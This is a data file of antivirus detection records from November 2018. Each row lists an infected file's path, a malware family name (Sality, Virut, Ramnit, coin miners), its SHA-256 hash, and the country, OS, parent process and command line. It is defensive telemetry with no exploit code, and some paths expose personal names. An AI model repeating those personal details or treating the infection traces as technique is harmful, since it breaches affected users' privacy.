  Row(detection=Row(filename='แอโรบิค.exe', filepath='E:\\music\\แอโรบิค\\แอโรบิค.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='35ba276c0faee25c283cc44f0f6015eb2e27230d4235746401e9020705c75e19', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vrally2.exe', filepath='\\?\\L:\\السيارات 3\\Vrally2.exe', filesize=1024000, name='W32/Sality.#M1.#R1'), hash='4c246da131280c1e93cdd05c434ff63354a3c47ae7e59126cdbdaed7bf8024ed', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:27:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='irzspggs.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Synaptics\\irzspggs.dll', filesize=1088000, name='HEUR/AGEN.1026962.#M1.#R1'), hash='62ec9b9b17a72857e33842137467c42b9e2a004b367501c6cb7f03c264d8a039', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001204-aa8ee4c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235245-023F16A9\\AVSCAN-20181102-001204-AA8EE4C4', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:12:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pre-grohtml.exe', filepath='G:\\دورة صيانة 2017\\imie tool\\IMEI CHANGER\\Dragonface-V10\\CPFOP\\bin\\pre-grohtml.exe', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='2f6efde2d5a33a3d5a3d794f08dbce341c978b6f5207040568fcb44e39960872', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\mshta.exe', parentsize=13312, timestamp='2018-11-01T13:01:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\软件\\CASS7.1  CAD2006\\AutoCAD2006\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='7e32ec6bf01a16170621afaaac6a3f1408567856c45497a3f749203ff61968a1', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:57:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:28:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=6144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4f1b7970af8b8a2069515ac3197d4114264ce0b6a2179609286f1e50889f6921', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T05:44:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qtcore4.dll', filepath='E:\\Kingdoms of Amalur Reckoningz\\Core\\QtCore4.dll', filesize=2752000, name='W32/Ramnit.CD.#M1.#R1'), hash='56e7d7efba678b1e39d429c7e2202c2e80d8c4a16a9646efa2a5edd744891478', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T13:48:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='410.exe', filepath='F:\\New folder\\Corel Draw 12\\410\\410.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151641-4c399e24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151641-4C399E24', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081651-452abaeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081640-431A7124\\AVSCAN-20181101-081651-452ABAEB', filesize=320000, name='TR/Black.Gen2.#M1.#R1'), hash='a6e72df8ccc11a35e64106d808aad51944b2c3ca470a8d6034e0437702dcb7d6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:16:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:55:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='c:\\applic~1\\service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline='2904', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Applications\\Service.exe', parentsize=14208000, timestamp='2018-11-01T09:17:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150340-bedc493a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150340-BEDC493A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='slides.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\SLIDES.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kur.exe', filepath='c:\\users\\X\\desktop\\kur.exe', filesize=384000, name='SPR/Silentall.88e5b8.#M1.#R1'), hash='88e5b88fe0995658a8c99f218b42050f370377c321dd1a36635a9495e7aab5ea', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T10:55:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=7776000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d82b740a1c2c66c8059f3fb1ba4e1ed2fa311c9cde4051c70cdcaee201fcd996', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T12:58:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='animazione.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\ANIMAZIONE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='formenti maria rosa.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\FORMENTI MARIA ROSA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nerviosas.exe', filepath='H:\\nerviosas.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='c6d1f31d2a689d0585ffc98ddf7f6e7356b27e24a6faf6b974810e597651f17e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T01:21:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{DC7A9AF2-4E10-4F1C-BF23-AD934E0E5040}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b2fe9386f50e24bb260b35b6e0e706ab082c145ff288472ff1da90a3babcccad', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094327-f32355d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094327-F32355D7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:43:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ps2pdf995.exe', filepath='D:\\BKP\\Desktop\\Lixo\\ps2pdf995.exe', filesize=8388000, name='W32/Neshta.A.#M1.#R1'), hash='9f0b2c81ae468ee620aea67b2d9be6f083ac61f939b01554bca3372a11acb3b1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:01:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='questionari.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\PROJECT WORK\\QUESTIONARI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140.exe', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='certificazione delle competenze - crediti formativi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\MASTER\\CERTIFICAZIONE DELLE COMPETENZE\\CERTIFICAZIONE DELLE COMPETENZE - CREDITI FORMATIVI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mercato lavoro.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ORGANIZZAZIONE AZIENDALE\\MERCATO LAVORO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3187.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3187.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095222-59a3b2a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095222-59A3B2A5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:52:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cost done.exe', filepath='F:\\Toufiq Share\\saiful\\Costing\\Cost Done\\Cost Done.exe', filesize=512000, name='TR/Drop.Agent.bjxj.#M1.#R1'), hash='93f590521bdeaf93ea0a5140c7c75467005b5123f8c2de960cb7bbb77b2b6aa1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:30:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trzc21a.tmp', filepath='\\\\?\\C:\\Applications\\trzC21A.tmp', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:19:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='downloader-fuer-translationde.exe', filepath='C:\\Users\\X\\Downloads\\Downloader-fuer-translationde.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='84e43d14e7fb9b5cfa4592b352c3f419d28549bdfc51546aba18b12f2b5fab30', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T17:32:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:34:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243e0', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243e0', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:49:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-04T13:27:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T14:49:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132209-48a53127', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132209-48A53127', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:22:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='9e7b17d7cd1a7c0444f9da80463b7f1969832172c72bf6de93fd20aaa4d90bac', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:02:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-094744-81fa3fea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e94398e3\\AVSCAN-20181104-094646-7AE93737\\AVSCAN-20181104-094744-81FA3FEA', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:47:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T02:47:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001021-6084696f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001021-6084696F', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:41:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-04T00:39:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:41:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162254-f23b2548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-162254-F23B2548', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:23:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00002209', filepath='C:\\Windows\\Temp\\6d19c869-fec0-4099-85af-186e76df7c7c\\tmp0000031f\\tmp00002209', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='ab20d1793daa2e72ab7539e513f224457a27fa17f0ddd9af39de8b9adf4c1dea', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.1.856.11526\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-04T18:17:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:31:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gccustomhook.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\AdobeGCClient\\customhook\\gccustomhook.exe', filesize=1976000, name='W32/Sality.AT.#M1.#R1'), hash='712a5908ea66f2cd486d0fe6a8050096a6a75cd68d168788aeca5883f0a588b9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:7lm1vo8smkq48h5f.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T20:47:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='touchup.exe', filepath='C:\\Program Files\\The Sims 4\\__Installer\\DLC\\GP02\\__Installer\\Touchup.exe', filesize=972000, name='W32/Jeefo.A.#M1.#R1'), hash='aa5e55ecf34e18c71aa66fe596b1cdce7a729dbfad9567146a76072e98cfc405', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:GxBPWRuDckuH3I\\\\\\/P.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T10:31:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\New folder\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:8VpozxhbeU6KU0m8.1', country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T16:33:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='iiwusqomkv.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\iiwusqomkV.exe', filesize=85584000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='8bc154916474de9fcf7b18d62ec08a73e7d5c869bc477c4063d85171d3967601', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23808, timestamp='2018-11-04T00:48:31Z'), dt=datetime.date(2018, 11, 4)),
